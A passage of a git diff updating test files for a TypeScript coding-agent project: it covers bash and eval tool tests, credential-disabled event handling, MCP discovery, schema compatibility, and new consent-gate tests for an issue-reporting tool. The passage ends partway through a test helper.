b/packages/coding-agent/test/read-tool-group.test.ts index a1c3472a9..38884ccee 100644 --- a/packages/coding-agent/test/read-tool-group.test.ts +++ b/packages/coding-agent/test/read-tool-group.test.ts @@ -99,7 +99,7 @@ describe("readArgsTargetInternalUrl", () => { it.each([ ["skill://my-skill"], ["skill://my-skill/file.md"], - ["pi://docs/tools/read.md"], + ["omp://docs/tools/read.md"], ["issue://123"], ["pr://can1357/oh-my-pi/456"], ["agent://abc"], diff --git a/packages/coding-agent/test/sdk-credential-disabled-bridge.test.ts b/packages/coding-agent/test/sdk-credential-disabled-bridge.test.ts index 020711ef8..fe0bd9e0b 100644 --- a/packages/coding-agent/test/sdk-credential-disabled-bridge.test.ts +++ b/packages/coding-agent/test/sdk-credential-disabled-bridge.test.ts @@ -118,13 +118,17 @@ describe("createAgentSession credential_disabled subscription", () => { if (events.length > waiters.length) { return Promise.resolve(events[waiters.length] as CredentialDisabledEvent); } - return new Promise<CredentialDisabledEvent>(resolve => { - waiters.push({ resolve }); - }); + const { promise, resolve } = Promise.withResolvers<CredentialDisabledEvent>(); + waiters.push({ resolve }); + return promise; }; return { factory, events, next }; }; + const drainCredentialDisabledDispatch = async (): Promise<void> => { + for (let i = 0; i < 5; i++) await Promise.resolve(); + }; + afterEach(() => { vi.restoreAllMocks(); for (const dir of tempDirs.splice(0)) { @@ -190,8 +194,8 @@ describe("createAgentSession credential_disabled subscription", () => { // Post-dispose: only the embedder fires; the extension's listener was unsubscribed. await authStorage.set("openai", [expiredOAuth()]); await authStorage.getApiKey("openai", "post-dispose"); - // Allow any (non-existent) async listener microtasks a chance to run before asserting absence. - await Bun.sleep(20); + // Drain async dispatch turns before asserting absence. + await drainCredentialDisabledDispatch(); expect(embedderEvents).toEqual([ { provider: "anthropic", disabledCause: expect.stringContaining("invalid_grant") }, @@ -242,7 +246,7 @@ describe("createAgentSession credential_disabled subscription", () => { const wait2 = Promise.all([ext2.next(), ext3.next()]); await authStorage.getApiKey("openai", "concurrent-2"); await wait2; - await Bun.sleep(20); + await drainCredentialDisabledDispatch(); expect(embedderEvents.map(e => e.provider)).toEqual(["anthropic", "openai"]); expect(ext1.events.map(e => e.provider)).toEqual(["anthropic"]); expect(ext2.events.map(e => e.provider)).toEqual(["anthropic", "openai"]); @@ -255,7 +259,7 @@ describe("createAgentSession credential_disabled subscription", () => { const wait3 = ext3.next(); await authStorage.getApiKey("google", "concurrent-3"); await wait3; - await Bun.sleep(20); + await drainCredentialDisabledDispatch(); expect(embedderEvents.map(e => e.provider)).toEqual(["anthropic", "openai", "google"]); expect(ext1.events.map(e => e.provider)).toEqual(["anthropic"]); expect(ext2.events.map(e => e.provider)).toEqual(["anthropic", "openai"]); @@ -266,7 +270,7 @@ describe("createAgentSession credential_disabled subscription", () => { await authStorage.set("anthropic", [expiredOAuth()]); await authStorage.getApiKey("anthropic", "concurrent-final"); - await Bun.sleep(20); + await drainCredentialDisabledDispatch(); expect(embedderEvents.map(e => e.provider)).toEqual(["anthropic", "openai", "google", "anthropic"]); expect(ext1.events).toHaveLength(1); expect(ext2.events).toHaveLength(2); @@ -291,7 +295,7 @@ describe("createAgentSession credential_disabled subscription", () => { await authStorage.set("anthropic", [expiredOAuth()]); failOAuthRefresh(); await authStorage.getApiKey("anthropic", "pre-init"); - await Bun.sleep(20); + await drainCredentialDisabledDispatch(); expect(ext.events).toHaveLength(0); // Initializing flushes the buffer through `emit()` with the now-populated @@ -330,7 +334,7 @@ describe("createAgentSession credential_disabled subscription", () => { await authStorage.set("anthropic", [expiredOAuth()]); failOAuthRefresh(); await authStorage.getApiKey("anthropic", "startup-with-embedder"); - await Bun.sleep(20); + await drainCredentialDisabledDispatch(); // Embedder fires immediately (sync push from AuthStorage's fan-out loop). The // extension still hasn't received it because the runner is uninitialized. @@ -380,7 +384,7 @@ describe("createAgentSession credential_disabled subscription", () => { failOAuthRefresh(); await authStorage.set("anthropic", [expiredOAuth()]); await authStorage.getApiKey("anthropic", "post-failure"); - await Bun.sleep(20); + await drainCredentialDisabledDispatch(); expect(embedderEvents).toEqual([ { provider: "anthropic", disabledCause: expect.stringContaining("invalid_grant") }, diff --git a/packages/coding-agent/test/sdk-mcp-discovery.test.ts b/packages/coding-agent/test/sdk-mcp-discovery.test.ts index 395a9b449..2d5d754c5 100644 --- a/packages/coding-agent/test/sdk-mcp-discovery.test.ts +++ b/packages/coding-agent/test/sdk-mcp-discovery.test.ts @@ -3,7 +3,8 @@ import * as fs from "node:fs"; import * as os from "node:os"; import * as path from "node:path"; import { ThinkingLevel } from "@oh-my-pi/pi-agent-core"; -import { Effort, getBundledModel, type Model } from "@oh-my-pi/pi-ai"; +import { AuthStorage, Effort, getBundledModel, type Model } from "@oh-my-pi/pi-ai"; +import { ModelRegistry } from "@oh-my-pi/pi-coding-agent/config/model-registry"; import { Settings } from "@oh-my-pi/pi-coding-agent/config/settings"; import type { CustomTool } from "@oh-my-pi/pi-coding-agent/extensibility/custom-tools/types"; import { createAgentSession } from "@oh-my-pi/pi-coding-agent/sdk"; @@ -41,15 +42,22 @@ function createReasoningModel(): Model<"openai-responses"> { }; } +const oldSessionMtime = new Date("2000-01-01T00:00:00.000Z"); + describe("createAgentSession MCP discovery prompt gating", () => { let tempDir: string; + let authStorage: AuthStorage; + let modelRegistry: ModelRegistry; - beforeEach(() => { + beforeEach(async () => { tempDir = path.join(os.tmpdir(), `pi-sdk-mcp-discovery-${Snowflake.next()}`); fs.mkdirSync(tempDir, { recursive: true }); + authStorage = await AuthStorage.create(path.join(tempDir, "auth.db")); + modelRegistry = new ModelRegistry(authStorage); }); afterEach(() => { + authStorage.close(); if (tempDir && fs.existsSync(tempDir)) { fs.rmSync(tempDir, { recursive: true, force: true }); } @@ -59,6 +67,7 @@ describe("createAgentSession MCP discovery prompt gating", () => { const { session } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: SessionManager.inMemory(), settings: Settings.isolated({ "mcp.discoveryMode": true }), model: getBundledModel("openai", "gpt-4o-mini"), @@ -83,6 +92,7 @@ describe("createAgentSession MCP discovery prompt gating", () => { const { session } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: SessionManager.inMemory(), settings: Settings.isolated({ "tools.discoveryMode": "all" }), model: getBundledModel("openai", "gpt-4o-mini"), @@ -106,6 +116,7 @@ describe("createAgentSession MCP discovery prompt gating", () => { const { session } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: SessionManager.inMemory(), settings: Settings.isolated({ "mcp.discoveryMode": true }), model: getBundledModel("openai", "gpt-4o-mini"), @@ -139,6 +150,7 @@ describe("createAgentSession MCP discovery prompt gating", () => { const { session } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: SessionManager.inMemory(), settings: Settings.isolated({ "mcp.discoveryMode": true, @@ -173,6 +185,7 @@ describe("createAgentSession MCP discovery prompt gating", () => { const { session } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: SessionManager.inMemory(), settings: Settings.isolated({ "mcp.discoveryMode": true }), model: getBundledModel("openai", "gpt-4o-mini"), @@ -196,6 +209,7 @@ describe("createAgentSession MCP discovery prompt gating", () => { const { session } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: SessionManager.inMemory(), settings: Settings.isolated({ "tools.discoveryMode": "all" }), model: getBundledModel("openai", "gpt-4o-mini"), @@ -223,6 +237,7 @@ describe("createAgentSession MCP discovery prompt gating", () => { const { session: firstSession } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: firstManager, settings: Settings.isolated({ "mcp.discoveryMode": true, @@ -251,14 +266,15 @@ describe("createAgentSession MCP discovery prompt gating", () => { const sessionFile = firstSession.sessionFile; expect(sessionFile).toBeDefined(); await firstSession.sessionManager.rewriteEntries(); + fs.utimesSync(sessionFile!, oldSessionMtime, oldSessionMtime); const persistedBeforeResume = fs.readFileSync(sessionFile!, "utf8"); const persistedMtimeBeforeResume = fs.statSync(sessionFile!).mtimeMs; - await Bun.sleep(20); await firstSession.dispose(); const resumedManager = await SessionManager.open(sessionFile!, tempDir); const { session: resumedSession } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: resumedManager, settings: Settings.isolated({ "mcp.discoveryMode": true, @@ -304,13 +320,14 @@ describe("createAgentSession MCP discovery prompt gating", () => { const sessionFile = sessionManager.getSessionFile(); expect(sessionFile).toBeDefined(); await sessionManager.rewriteEntries(); + fs.utimesSync(sessionFile!, oldSessionMtime, oldSessionMtime); const persistedBeforeResume = fs.readFileSync(sessionFile!, "utf8"); const persistedMtimeBeforeResume = fs.statSync(sessionFile!).mtimeMs; - await Bun.sleep(20); const resumedManager = await SessionManager.open(sessionFile!, tempDir); const { session } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: resumedManager, settings: Settings.isolated({ "mcp.discoveryMode": true, @@ -352,6 +369,7 @@ describe("createAgentSession MCP discovery prompt gating", () => { const { session: firstSession } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: firstManager, settings: Settings.isolated({ "mcp.discoveryMode": true }), model: getBundledModel("openai", "gpt-4o-mini"), @@ -379,6 +397,7 @@ describe("createAgentSession MCP discovery prompt gating", () => { const { session: resumedSession } = await createAgentSession({ cwd: tempDir, agentDir: tempDir, + modelRegistry, sessionManager: resumedManager, settings: Settings.isolated({ "mcp.discoveryMode": true }), model: getBundledModel("openai", "gpt-4o-mini"), diff --git a/packages/coding-agent/test/tools.test.ts b/packages/coding-agent/test/tools.test.ts index 33957fdc6..8b18dbb8f 100644 --- a/packages/coding-agent/test/tools.test.ts +++ b/packages/coding-agent/test/tools.test.ts @@ -1085,7 +1085,7 @@ function b() { const updates: string[] = []; const result = await bashTool.execute( "test-call-8-stream", - { command: "for i in 1 2 3; do echo $i; sleep 0.2; done" }, + { command: "for i in 1 2 3; do echo $i; sleep 0.05; done" }, undefined, update => { const text = update.content?.find(c => c.type === "text")?.text ?? ""; @@ -1155,7 +1155,7 @@ function b() { expect(getTextOutput(result)).toContain("short"); expect(result.details?.timeoutSeconds).toBe(300); expect(result.details?.async).toBeUndefined(); - await Bun.sleep(150); + await asyncJobManager.drainDeliveries({ timeoutMs: 1 }); expect(deliveries).toEqual([]); await asyncJobManager.dispose(); }); @@ -1174,7 +1174,7 @@ function b() { testDir, Settings.isolated({ "bash.autoBackground.enabled": true, - "bash.autoBackground.thresholdMs": 50, + "bash.autoBackground.thresholdMs": 10, }), { getSessionId: () => "test-session", @@ -1184,7 +1184,7 @@ function b() { ); const result = await autoBackgroundBashTool.execute("test-call-9-auto-running", { - command: "printf 'start\\n'; sleep 0.2; printf 'done\\n'", + command: "printf 'start\\n'; sleep 0.05; printf 'done\\n'", }); expect(result.details?.async?.state).toBe("running"); @@ -1199,7 +1199,7 @@ function b() { const runningJob = asyncJobManager.getJob(jobId); expect(runningJob?.status).toBe("running"); await runningJob?.promise; - await Bun.sleep(50); + await asyncJobManager.drainDeliveries({ timeoutMs: 1 }); expect(deliveries).toHaveLength(1); expect(deliveries[0]?.jobId).toBe(jobId); expect(deliveries[0]?.text).toContain("done"); @@ -1244,7 +1244,7 @@ function b() { const runningJob = asyncJobManager.getJob(jobId); expect(runningJob?.status).toBe("running"); await runningJob?.promise; - await Bun.sleep(50); + await asyncJobManager.drainDeliveries({ timeoutMs: 1 }); expect(deliveries).toHaveLength(1); expect(deliveries[0]?.jobId).toBe(jobId); expect(deliveries[0]?.text).toContain("Command timed out after 1 seconds"); @@ -1269,9 +1269,16 @@ function b() { it("should abort and recover for subsequent commands", async () => { const controller = new AbortController(); - const promise = bashTool.execute("test-call-10-abort", { command: "sleep 5" }, controller.signal); - await Bun.sleep(200); - controller.abort("test abort"); + const promise = bashTool.execute( + "test-call-10-abort", + { command: "printf 'started\\n'; sleep 5" }, + controller.signal, + update => { + if (update.content?.some(content => content.type === "text" && content.text.includes("started"))) { + controller.abort("test abort"); + } + }, + ); await expect(promise).rejects.toThrow(/abort|cancel|timed out/i); const result = await bashTool.execute("test-call-10-after-abort", { command: "echo ok" }); diff --git a/packages/coding-agent/test/tools/bash-sixel-render.test.ts b/packages/coding-agent/test/tools/bash-sixel-render.test.ts index d15b614b2..cdb3c707f 100644 --- a/packages/coding-agent/test/tools/bash-sixel-render.test.ts +++ b/packages/coding-agent/test/tools/bash-sixel-render.test.ts @@ -4,8 +4,8 @@ import * as path from "node:path"; import type { RenderResultOptions } from "@oh-my-pi/pi-agent-core"; import { getThemeByName, setThemeInstance } from "@oh-my-pi/pi-coding-agent/modes/theme/theme"; import { bashToolRenderer } from "@oh-my-pi/pi-coding-agent/tools/bash"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; import { ImageProtocol, TERMINAL } from "@oh-my-pi/pi-tui"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; type MutableTerminalInfo = { imageProtocol: ImageProtocol | null; diff --git a/packages/coding-agent/test/tools/eval-display-text.test.ts b/packages/coding-agent/test/tools/eval-display-text.test.ts index 37acfdd7e..b442a25a9 100644 --- a/packages/coding-agent/test/tools/eval-display-text.test.ts +++ b/packages/coding-agent/test/tools/eval-display-text.test.ts @@ -46,7 +46,7 @@ describe("EvalTool display() text surfacing", () => { const tool = new EvalTool(makeSession()); const result = await tool.execute("call-display-json", { - input: "```js\ndisplay({ stdout: 'hi', exit_code: 0 });\n```\n", + cells: [{ language: "js", code: "```js\ndisplay({ stdout: 'hi', exit_code: 0 });\n```\n" }], }); const text = result.content.map(c => (c.type === "text" ? c.text : "")).join("\n"); @@ -67,7 +67,7 @@ describe("EvalTool display() text surfacing", () => { const tool = new EvalTool(makeSession()); const result = await tool.execute("call-mixed", { - input: "```js\nprint('before'); display([1,2,3]);\n```\n", + cells: [{ language: "js", code: "```js\nprint('before'); display([1,2,3]);\n```\n" }], }); const text = result.content.map(c => (c.type === "text" ? c.text : "")).join("\n"); @@ -87,7 +87,9 @@ describe("EvalTool display() text surfacing", () => { const tool = new EvalTool(makeSession()); const result = await tool.execute("call-image", { - input: "```js\ndisplay({ type: 'image', data: '...', mimeType: 'image/png' });\n```\n", + cells: [ + { language: "js", code: "```js\ndisplay({ type: 'image', data: '...', mimeType: 'image/png' });\n```\n" }, + ], }); const imageBlocks = result.content.filter(c => c.type === "image"); @@ -109,7 +111,7 @@ describe("EvalTool display() text surfacing", () => { const tool = new EvalTool(makeSession()); const result = await tool.execute("call-empty", { - input: "```js\nconst x = 1;\n```\n", + cells: [{ language: "js", code: "```js\nconst x = 1;\n```\n" }], }); const text = result.content.map(c => (c.type === "text" ? c.text : "")).join("\n"); @@ -127,7 +129,7 @@ describe("EvalTool display() text surfacing", () => { const tool = new EvalTool(makeSession()); const result = await tool.execute("call-huge", { - input: "```js\ndisplay({ payload: 'x'.repeat(20000) });\n```\n", + cells: [{ language: "js", code: "```js\ndisplay({ payload: 'x'.repeat(20000) });\n```\n" }], }); const text = result.content.map(c => (c.type === "text" ? c.text : "")).join("\n"); diff --git a/packages/coding-agent/test/tools/eval-fallback.test.ts b/packages/coding-agent/test/tools/eval-fallback.test.ts index 9fecf9abc..112fd43f8 100644 --- a/packages/coding-agent/test/tools/eval-fallback.test.ts +++ b/packages/coding-agent/test/tools/eval-fallback.test.ts @@ -5,13 +5,13 @@ import * as pyKernel from "@oh-my-pi/pi-coding-agent/eval/py/kernel"; import type { ToolSession } from "@oh-my-pi/pi-coding-agent/tools"; import { EvalTool } from "@oh-my-pi/pi-coding-agent/tools/eval"; -function makeSession(): ToolSession { +function makeSession(settings = Settings.isolated()): ToolSession { return { cwd: "/tmp/eval-test", hasUI: false, getSessionFile: () => null, getSessionSpawns: () => null, - settings: Settings.isolated(), + settings, }; } @@ -28,50 +28,76 @@ const mockResult = { displayOutputs: [], }; -describe("EvalTool language resolution", () => { +describe("EvalTool language dispatch", () => { afterEach(() => { vi.restoreAllMocks(); }); - it("dispatches to js when fenced code declares ```js", async () => { - vi.spyOn(pyKernel, "checkPythonKernelAvailability").mockResolvedValue({ ok: true }); + it('dispatches to the JS backend when cell.language === "js"', async () => { const jsExecuteSpy = vi.spyOn(evalIndex.jsBackend, "execute").mockResolvedValue(mockResult); const pythonExecuteSpy = vi.spyOn(evalIndex.pythonBackend, "execute"); const tool = new EvalTool(makeSession()); - await tool.execute("call-1", { - input: "```js one\nconst x = 1;\n```\n", + await tool.execute("call-js", { + cells: [{ language: "js", code: "const x = 1;" }], }); expect(jsExecuteSpy).toHaveBeenCalledTimes(1); expect(pythonExecuteSpy).not.toHaveBeenCalled(); }); - it("dispatches to python when fenced code declares ```python", async () => { - const pythonExecuteSpy = vi.spyOn(evalIndex.pythonBackend, "execute").mockResolvedValue(mockResult); + it('dispatches to the Python backend when cell.language === "py"', async () => { + vi.spyOn(pyKernel, "checkPythonKernelAvailability").mockResolvedValue({ ok: true }); vi.spyOn(evalIndex.pythonBackend, "isAvailable").mockResolvedValue(true); + const pythonExecuteSpy = vi.spyOn(evalIndex.pythonBackend, "execute").mockResolvedValue(mockResult); const jsExecuteSpy = vi.spyOn(evalIndex.jsBackend, "execute"); const tool = new EvalTool(makeSession()); - await tool.execute("call-2", { - input: "```python one\nprint('hi')\n```\n", + await tool.execute("call-py", { + cells: [{ language: "py", code: "print('hi')" }], }); expect(pythonExecuteSpy).toHaveBeenCalledTimes(1); expect(jsExecuteSpy).not.toHaveBeenCalled(); }); - it("auto-detects python via syntactic markers when fence is bare", async () => { - const pythonExecuteSpy = vi.spyOn(evalIndex.pythonBackend, "execute").mockResolvedValue(mockResult); + it("interleaves backends across cells in a single call", async () => { + vi.spyOn(pyKernel, "checkPythonKernelAvailability").mockResolvedValue({ ok: true }); vi.spyOn(evalIndex.pythonBackend, "isAvailable").mockResolvedValue(true); - const jsExecuteSpy = vi.spyOn(evalIndex.jsBackend, "execute"); + const pythonExecuteSpy = vi.spyOn(evalIndex.pythonBackend, "execute").mockResolvedValue(mockResult); + const jsExecuteSpy = vi.spyOn(evalIndex.jsBackend, "execute").mockResolvedValue(mockResult); const tool = new EvalTool(makeSession()); - await tool.execute("call-3", { - input: "def greet():\n print('hi')\ngreet()\n", + await tool.execute("call-mixed", { + cells: [ + { language: "py", code: "x = 1" }, + { language: "js", code: "const y = 2;" }, + ], }); expect(pythonExecuteSpy).toHaveBeenCalledTimes(1); - expect(jsExecuteSpy).not.toHaveBeenCalled(); + expect(jsExecuteSpy).toHaveBeenCalledTimes(1); + }); + + it("rejects py cells when eval.py is disabled", async () => { + const settings = Settings.isolated(); + settings.set("eval.py", false); + const tool = new EvalTool(makeSession(settings)); + await expect( + tool.execute("call-py-disabled", { + cells: [{ language: "py", code: "print('hi')" }], + }), + ).rejects.toThrow(/eval\.py = false/); + }); + + it("rejects js cells when eval.js is disabled", async () => { + const settings = Settings.isolated(); + settings.set("eval.js", false); + const tool = new EvalTool(makeSession(settings)); + await expect( + tool.execute("call-js-disabled", { + cells: [{ language: "js", code: "const x = 1;" }], + }), + ).rejects.toThrow(/eval\.js = false/); }); }); diff --git a/packages/coding-agent/test/tools/gh.test.ts b/packages/coding-agent/test/tools/gh.test.ts index ec923698d..fc5f6d658 100644 --- a/packages/coding-agent/test/tools/gh.test.ts +++ b/packages/coding-agent/test/tools/gh.test.ts @@ -725,9 +725,6 @@ describe("github tool", () => { it("treats git.remote.add as a no-op when the remote already exists with the same URL", async () => { const fixture = await createPrFixture(); try { - // Fixture already created `forksrc -> forkBare`. A second add with the - // same URL must succeed silently — this is the cross-process / leftover- - // state path that used to fail with `error: remote forksrc already exists`. await git.remote.add(fixture.repoRoot, "forksrc", fixture.forkBare); expect(runGit(fixture.repoRoot, ["remote", "get-url", "forksrc"])).toBe(fixture.forkBare); } finally { @@ -751,17 +748,18 @@ describe("github tool", () => { it("serializes concurrent git mutations through withRepoLock so callers don't race git's internal locks", async () => { const fixture = await createPrFixture(); try { - // Without serialization, ~20 concurrent `git config` invocations against - // the same `.git/config` produce "could not lock config file" failures - // (the lock is O_EXCL with no waiter). Wrapping each write in - // `withRepoLock` makes the queue per-repo so all 20 succeed. - const writes = Array.from({ length: 20 }, (_, idx) => + // Without serialization, concurrent `git config` invocations against the + // same `.git/config` produce "could not lock config file" failures (the + // lock is O_EXCL with no waiter). Wrapping each write in `withRepoLock` + // makes the queue per-repo so all writes succeed. + const writeCount = 8; + const writes = Array.from({ length: writeCount }, (_, idx) => git.withRepoLock(fixture.repoRoot, () => git.config.set(fixture.repoRoot, `branch.race-test.key${idx}`, `value-${idx}`), ), ); await Promise.all(writes); - for (let idx = 0; idx < 20; idx += 1) { + for (let idx = 0; idx < writeCount; idx += 1) { expect(runGit(fixture.repoRoot, ["config", "--get", `branch.race-test.key${idx}`])).toBe(`value-${idx}`); } } finally { diff --git a/packages/coding-agent/test/tools/inspect-image.test.ts b/packages/coding-agent/test/tools/inspect-image.test.ts index ee7bbbe1a..fe27a38cb 100644 --- a/packages/coding-agent/test/tools/inspect-image.test.ts +++ b/packages/coding-agent/test/tools/inspect-image.test.ts @@ -9,7 +9,7 @@ import type { ToolSession } from "@oh-my-pi/pi-coding-agent/tools"; import { InspectImageTool } from "@oh-my-pi/pi-coding-agent/tools/inspect-image"; import { inspectImageToolRenderer } from "@oh-my-pi/pi-coding-agent/tools/inspect-image-renderer"; import { toolRenderers } from "@oh-my-pi/pi-coding-agent/tools/renderers"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; const TINY_PNG_BASE64 = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mP8z8DwHwAFBQIAX8jx0gAAAABJRU5ErkJggg=="; diff --git a/packages/coding-agent/test/tools/lsp-regressions.test.ts b/packages/coding-agent/test/tools/lsp-regressions.test.ts index affe4c8e7..2914eee63 100644 --- a/packages/coding-agent/test/tools/lsp-regressions.test.ts +++ b/packages/coding-agent/test/tools/lsp-regressions.test.ts @@ -28,9 +28,8 @@ import { import { getThemeByName } from "@oh-my-pi/pi-coding-agent/modes/theme/theme"; import type { ToolSession } from "@oh-my-pi/pi-coding-agent/tools"; import { clampTimeout } from "@oh-my-pi/pi-coding-agent/tools/tool-timeouts"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; import * as piUtils from "@oh-my-pi/pi-utils"; -import { TempDir } from "@oh-my-pi/pi-utils"; +import { sanitizeText, TempDir } from "@oh-my-pi/pi-utils"; describe("lsp regressions", () => { afterEach(() => { diff --git a/packages/coding-agent/test/tools/provider-schema-compatibility.test.ts b/packages/coding-agent/test/tools/provider-schema-compatibility.test.ts index 558eba703..f5dd5f11e 100644 --- a/packages/coding-agent/test/tools/provider-schema-compatibility.test.ts +++ b/packages/coding-agent/test/tools/provider-schema-compatibility.test.ts @@ -1,10 +1,10 @@ import { describe, expect, it } from "bun:test"; import { adaptSchemaForStrict, - prepareSchemaForCCA, + normalizeSchemaForCCA, + normalizeSchemaForGoogle, type SchemaCompatibilityProvider, type SchemaCompatibilityResult, - sanitizeSchemaForGoogle, toolWireSchema, validateSchemaCompatibility, validateStrictSchemaEnforcement, @@ -103,16 +103,16 @@ describe("builtin tool schemas provider compatibility", () => { } try { - const googleSchema = sanitizeSchemaForGoogle(schema); + const googleSchema = normalizeSchemaForGoogle(schema); const googleCompatibility = validateSchemaCompatibility(googleSchema, "google"); if (!googleCompatibility.compatible) { failures.push(formatCompatibilityIssues(name, "google", googleCompatibility)); } } catch (error) { - failures.push(`${name} (google): sanitizeSchemaForGoogle threw: ${String(error)}`); + failures.push(`${name} (google): normalizeSchemaForGoogle threw: ${String(error)}`); } - const cloudCodeAssistSchema = prepareSchemaForCCA(schema); + const cloudCodeAssistSchema = normalizeSchemaForCCA(schema); const cloudCodeAssistCompatibility = validateSchemaCompatibility( cloudCodeAssistSchema, "cloud-code-assist-claude", diff --git a/packages/coding-agent/test/tools/report-tool-issue-consent.test.ts b/packages/coding-agent/test/tools/report-tool-issue-consent.test.ts new file mode 100644 index 000000000..c8c26a471 --- /dev/null +++ b/packages/coding-agent/test/tools/report-tool-issue-consent.test.ts @@ -0,0 +1,148 @@ +/** + * Consent gate around `report_tool_issue`. Asserts: + * + * 1. With no handler registered, consent defaults to `false` and the tool's + * `execute` returns the canonical "Noted, thanks!" without touching the DB. + * 2. The handler fires exactly once per process even across concurrent calls + * (single-flight), and the decision is persisted to both the local and + * registered persistent `Settings` instances. + * 3. A persisted `"granted"` short-circuits the handler. + * 4. A persisted `"denied"` short-circuits the handler AND no-ops the tool. + */ +import { afterEach, describe, expect, it } from "bun:test"; +import { Settings } from "@oh-my-pi/pi-coding-agent/config/settings"; +import { + __resetAutoQaConsentForTests, + resolveAutoQaConsent, + setAutoQaConsentHandler, +} from "@oh-my-pi/pi-coding-agent/tools/report-tool-issue"; + +afterEach(() => { + __resetAutoQaConsentForTests(); +}); + +describe("resolveAutoQaConsent", () => { + it("defaults to false when no handler is registered", async () => { + const settings = Settings.isolated(); + expect(await resolveAutoQaConsent(settings)).toBe(false); + // Default-deny must NOT persist anything — the next process invocation + // gets to re-prompt instead of being silently stuck on "no". + expect(settings.get("dev.autoqa.consent")).toBe("unset"); + }); + + it("returns persisted `granted` without invoking the handler", async () => { + const settings = Settings.isolated({ "dev.autoqa.consent": "granted" }); + let calls = 0; + setAutoQaConsentHandler(async () => { + calls += 1; + return false; + }); + expect(await resolveAutoQaConsent(settings)).toBe(true); + expect(calls).toBe(0); + }); + + it("returns persisted `denied` without invoking the handler", async () => { + const settings = Settings.isolated({ "dev.autoqa.consent": "denied" }); + let calls = 0; + setAutoQaConsentHandler(async () => { + calls += 1; + return true; + }); + expect(await resolveAutoQaConsent(settings)).toBe(false); + expect(calls).toBe(0); + }); + + it("invokes the handler exactly once for concurrent callers and persists the answer", async () => { + const local = Settings.isolated(); + const persistent = Settings.isolated(); + let calls = 0; + let release: (v: boolean) => void = () => undefined; + setAutoQaConsentHandler(async () => { + calls += 1; + return new Promise<boolean>(resolve => { + release = resolve; + }); + }, persistent); + + const a = resolveAutoQaConsent(local); + const b = resolveAutoQaConsent(local); + const c = resolveAutoQaConsent(local); + // Wait a tick to ensure all three reached the in-flight branch. + await Promise.resolve(); + release(true); + + expect(await a).toBe(true); + expect(await b).toBe(true); + expect(await c).toBe(true); + expect(calls).toBe(1); + expect(local.get("dev.autoqa.consent")).toBe("granted"); + expect(persistent.get("dev.autoqa.consent")).toBe("granted"); + }); + + it("persists a `denied` decision so the next call short-circuits", async () => { + const local = Settings.isolated(); + const persistent = Settings.isolated(); + let calls = 0; + setAutoQaConsentHandler(async () => { + calls += 1; + return false; + }, persistent); + + expect(await resolveAutoQaConsent(local)).toBe(false); + expect(await resolveAutoQaConsent(local)).toBe(false); + expect(calls).toBe(1); + expect(local.get("dev.autoqa.consent")).toBe("denied"); + expect(persistent.get("dev.autoqa.consent")).toBe("denied"); + }); + + it("does not cache or persist when the handler throws (allows re-prompt)", async () => { + const settings = Settings.isolated(); + let calls = 0; + setAutoQaConsentHandler(async () => { + calls += 1; + throw new Error("dialog crashed"); + }); + + expect(await resolveAutoQaConsent(settings)).toBe(false); + // A second call must invoke the handler again — the throw path is + // transient, not a stuck "no". + expect(await resolveAutoQaConsent(settings)).toBe(false); + expect(calls).toBe(2); + expect(settings.get("dev.autoqa.consent")).toBe("unset"); + }); + + it("does not cache or persist when the handler returns null (dismiss/ESC)", async () => { + const local = Settings.isolated(); + const persistent = Settings.isolated(); + let calls = 0; + setAutoQaConsentHandler(async () => { + calls += 1; + // Mirrors the `showHookSelector` ESC path (returns `undefined`, + // which `#promptAutoQaConsent` maps to `null`). + return null; + }, persistent); + + expect(await resolveAutoQaConsent(local)).toBe(false); + // Second call must re-prompt — a stray ESC isn't a permanent opt-out. + expect(await resolveAutoQaConsent(local)).toBe(false); + expect(calls).toBe(2); + expect(local.get("dev.autoqa.consent")).toBe("unset"); + expect(persistent.get("dev.autoqa.consent")).toBe("unset"); + }); + + it("falls back to the registered persistent settings when the local snapshot is unset", async () => { + // Mirrors the subagent flow: subagent passes its in-memory snapshot + // (which lost the consent edit made on the parent), but the host's + // persistent Settings carries the real decision. + const subagentLocal = Settings.isolated(); + const hostPersistent = Settings.isolated({ "dev.autoqa.consent": "granted" }); + let calls = 0; + setAutoQaConsentHandler(async () => { + calls += 1; + return false; + }, hostPersistent); + + expect(await resolveAutoQaConsent(subagentLocal)).toBe(true); + expect(calls).toBe(0); + }); +}); diff --git a/packages/coding-agent/test/tools/report-tool-issue.test.ts b/packages/coding-agent/test/tools/report-tool-issue.test.ts new file mode 100644 index 000000000..60d41632c --- /dev/null +++ b/packages/coding-agent/test/tools/report-tool-issue.test.ts @@ -0,0 +1,303 @@ +import { Database } from "bun:sqlite"; +import { afterEach, beforeEach, describe, expect, it, vi } from "bun:test"; +import { Settings } from "@oh-my-pi/pi-coding-agent/config/settings"; +import { __resetAutoQaFlushStateForTests, flushGrievances } from "@oh-my-pi/pi-coding-agent/tools/report-tool-issue"; +import * as piUtils from "@oh-my-pi/pi-utils"; +import { hookFetch } from "@oh-my-pi/pi-utils"; + +function openTempDb(): Database { + const db = new Database(":memory:"); + db.run(` + CREATE TABLE IF NOT EXISTS grievances ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + model TEXT NOT NULL, + version TEXT NOT NULL, + tool TEXT NOT NULL, + report TEXT NOT NULL, + pushed INTEGER NOT NULL DEFAULT 0 + ); + `); + return db; +} + +function insertGrievance(db: Database, tool: string, report: string): number { + const info = db + .prepare("INSERT INTO grievances (model, version, tool, report) VALUES (?, 